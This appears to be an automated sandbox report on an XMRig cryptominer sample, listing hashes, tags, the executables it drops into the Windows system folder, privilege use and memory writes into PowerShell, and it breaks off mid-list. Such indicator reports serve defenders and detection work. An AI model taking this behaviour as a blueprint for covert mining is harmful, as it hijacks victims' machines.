Malware Analysis Report

2024-09-10 01:34

Sample ID 240613-m2x7mszdpl
Target 7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe
SHA256 5cdea44a05d7881fb29dbb25c11bb14533b53b8af0dda67cbd2475f70791f7ea
Tags
miner upx xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5cdea44a05d7881fb29dbb25c11bb14533b53b8af0dda67cbd2475f70791f7ea

Threat Level: Known bad

The file 7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

miner upx xmrig execution

Xmrig family

XMRig Miner payload

xmrig

XMRig Miner payload

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

UPX packed file

Executes dropped EXE

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-13 10:58

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-13 10:58

Reported

2024-06-13 11:01

Platform

win7-20240611-en

Max time kernel

91s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\aqVoOva.exe N/A
N/A N/A C:\Windows\System\vVpRmSL.exe N/A
N/A N/A C:\Windows\System\ZALNYZZ.exe N/A
N/A N/A C:\Windows\System\HXDKlfg.exe N/A
N/A N/A C:\Windows\System\cJQsBKN.exe N/A
N/A N/A C:\Windows\System\yNEfsBQ.exe N/A
N/A N/A C:\Windows\System\pPQJomb.exe N/A
N/A N/A C:\Windows\System\BfugwXW.exe N/A
N/A N/A C:\Windows\System\rTjpKjU.exe N/A
N/A N/A C:\Windows\System\uzMivXY.exe N/A
N/A N/A C:\Windows\System\weKPtyY.exe N/A
N/A N/A C:\Windows\System\woPILJW.exe N/A
N/A N/A C:\Windows\System\NYQfXVf.exe N/A
N/A N/A C:\Windows\System\TqVzJSS.exe N/A
N/A N/A C:\Windows\System\DdLJuzV.exe N/A
N/A N/A C:\Windows\System\VrNpAwS.exe N/A
N/A N/A C:\Windows\System\JfyHCGH.exe N/A
N/A N/A C:\Windows\System\haWFgvU.exe N/A
N/A N/A C:\Windows\System\cDcrWTh.exe N/A
N/A N/A C:\Windows\System\OIveXLg.exe N/A
N/A N/A C:\Windows\System\xiTQnZC.exe N/A
N/A N/A C:\Windows\System\ycUdbaO.exe N/A
N/A N/A C:\Windows\System\HrEEZgk.exe N/A
N/A N/A C:\Windows\System\FEmgXlk.exe N/A
N/A N/A C:\Windows\System\tpSrAID.exe N/A
N/A N/A C:\Windows\System\nWCjBdO.exe N/A
N/A N/A C:\Windows\System\RHAbgTb.exe N/A
N/A N/A C:\Windows\System\SkuSjEn.exe N/A
N/A N/A C:\Windows\System\gWZXiWz.exe N/A
N/A N/A C:\Windows\System\oEcDPlJ.exe N/A
N/A N/A C:\Windows\System\ltEwpmd.exe N/A
N/A N/A C:\Windows\System\mSdipaY.exe N/A
N/A N/A C:\Windows\System\qOVbIbv.exe N/A
N/A N/A C:\Windows\System\LjSfRtn.exe N/A
N/A N/A C:\Windows\System\Tznkuoj.exe N/A
N/A N/A C:\Windows\System\TMhyIwk.exe N/A
N/A N/A C:\Windows\System\fOSirut.exe N/A
N/A N/A C:\Windows\System\UaJcRsq.exe N/A
N/A N/A C:\Windows\System\FDurlUS.exe N/A
N/A N/A C:\Windows\System\qLcMpCy.exe N/A
N/A N/A C:\Windows\System\OiGnedr.exe N/A
N/A N/A C:\Windows\System\vhtfHid.exe N/A
N/A N/A C:\Windows\System\sAlAwdo.exe N/A
N/A N/A C:\Windows\System\pDfMsTc.exe N/A
N/A N/A C:\Windows\System\JLcmkyU.exe N/A
N/A N/A C:\Windows\System\NUADDtB.exe N/A
N/A N/A C:\Windows\System\QQyAjhu.exe N/A
N/A N/A C:\Windows\System\qJXbtCe.exe N/A
N/A N/A C:\Windows\System\ZJVlUvU.exe N/A
N/A N/A C:\Windows\System\ZFRyHZm.exe N/A
N/A N/A C:\Windows\System\CfcjdpC.exe N/A
N/A N/A C:\Windows\System\jVNIKOW.exe N/A
N/A N/A C:\Windows\System\YSKljNU.exe N/A
N/A N/A C:\Windows\System\MfwsQPY.exe N/A
N/A N/A C:\Windows\System\olClWJI.exe N/A
N/A N/A C:\Windows\System\WhlZgXK.exe N/A
N/A N/A C:\Windows\System\bfocjgN.exe N/A
N/A N/A C:\Windows\System\HoCvYnz.exe N/A
N/A N/A C:\Windows\System\KcLprvQ.exe N/A
N/A N/A C:\Windows\System\pmeumvw.exe N/A
N/A N/A C:\Windows\System\cykSXPy.exe N/A
N/A N/A C:\Windows\System\QuKgfhh.exe N/A
N/A N/A C:\Windows\System\PhASQpC.exe N/A
N/A N/A C:\Windows\System\DbgUkoM.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\iMjZaHp.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\CwlPdbm.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\taJeuyC.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\JNEUnuX.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\VdZYVnW.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\sRIWHAP.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\XBWPRWc.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\nAsmwVw.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wuoUHPy.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\KJLqSYb.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZmZugBP.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\lTnyyBA.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\TqzZpgr.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\AxoCKTi.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\SwtdkEX.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PCEAsiO.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ifRoLwG.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\kyAFglC.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\bPqoZoz.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\jeoCtFM.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UvtzjeT.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hvFAdJP.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\xpBmfIU.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ggrJoqB.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vlazxhf.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\fTLqnhJ.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\elpjEwk.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\zoGuqqh.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\nrLrQEQ.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\HtanFUq.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\CiOUfyG.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\gOdhpPC.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\AgbUxvt.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PmZkPnl.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\BOcjbgz.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\OZoWwlx.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\QjSEimc.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\OXoYZdm.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\FxQLGtN.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\xbAKdjW.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\QgPYHNf.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PrGqGKx.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\AFTbRnt.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\YDxFBEZ.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\HCiILcP.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\yeJvHpY.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hldaxZt.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\JJCFebx.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\glLGvvb.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\bbsrouQ.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\uMNcpQs.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\miSZGEO.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\pDfMsTc.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ddcvajF.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\yYFRdiR.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\EamxGBM.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZDOkEXv.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UNzZRAN.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\Dhkqhib.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\aipXTrh.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\jGpooGm.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\atNtPzB.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\rmIRXEF.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\FmQjkIq.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2020 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2020 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2020 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2020 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\aqVoOva.exe
PID 2020 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\aqVoOva.exe
PID 2020 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\aqVoOva.exe
PID 2020 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\vVpRmSL.exe
